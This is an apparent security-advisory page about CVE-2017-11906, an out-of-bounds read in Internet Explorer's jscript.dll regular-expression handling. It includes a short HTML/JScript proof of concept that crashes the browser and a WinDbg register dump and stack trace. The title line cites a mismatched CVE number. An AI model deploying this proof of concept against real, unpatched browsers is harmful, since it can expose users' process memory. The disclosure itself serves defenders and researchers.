Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read

Published 19 Dec 2017 00:00:00. Reported by Ivan Fratric. Source: packetstorm (packetstormsecurity.com).

Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read CVE-2017-1190

Related

Source, title and publication date of related entries:

0day.today: Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read Exploit (19 Dec 2017 00:00)
AttackerKB: CVE-2017-11906 (12 Dec 2017 21:29)
AttackerKB: CVE-2017-11919 (12 Dec 2017 21:29)
AttackerKB: CVE-2017-11887 (12 Dec 2017 21:29)
Circl: CVE-2017-11906 (13 Dec 2017 04:00)
CNVD: Microsoft Internet Explorer Information Disclosure Vulnerability (CNVD-2018-00751) (13 Dec 2017 00:00)
Check Point Advisories: Microsoft Internet Explorer Scripting Engine Information Disclosure (CVE-2017-11906) (20 Dec 2017 00:00)
CVE: CVE-2017-11906 (12 Dec 2017 21:00)
Cvelist: CVE-2017-11906 (12 Dec 2017 21:00)
Microsoft KB: Internet Explorer help (12 Dec 2017 08:00)
Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen

CVE-2017-11906

There is an out-of-bounds read in the jscript.dll library (used in IE, WPAD and other places):

PoC for IE (note: page heap might be required to observe the crash):

=========================================  
  
<!-- saved from url=(0014)about:internet -->  
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>  
<script language="Jscript.Encode">  
  
function go() {  
var r= new RegExp(Array(100).join('()'));  
''.search(r);  
alert(RegExp.lastParen);  
}  
  
go();  
  
</script>  
  
=========================================  
  
Debug log:  
  
=========================================  
  
(cec.a14): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
jscript!RegExpFncObj::LastParen+0x43:  
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????  
  
0:014> r  
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063  
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0  
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148  
r8=00000000130f9210 r9=0000000000000000 r10=000000000463fef0
r11=000000000463ff38 r12=0000000000000083 r13=0000000000000000
r14=00000000130f9210 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
jscript!RegExpFncObj::LastParen+0x43:  
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????  
  
0:014> k  
# Child-SP RetAddr Call Site  
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43  
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5  
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873  
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373  
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162  
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3  
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea  
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6  
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162  
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7  
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e  
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a  
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267  
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56  
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1  
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f  
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9  
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283  
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101  
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235  
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90  
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb  
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f  
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70  
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1  
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43  
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41  
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240  
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150  
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad  
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5  
1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555  
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3  
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f  
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f  
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd  
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d  
  
=========================================  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: ifratric
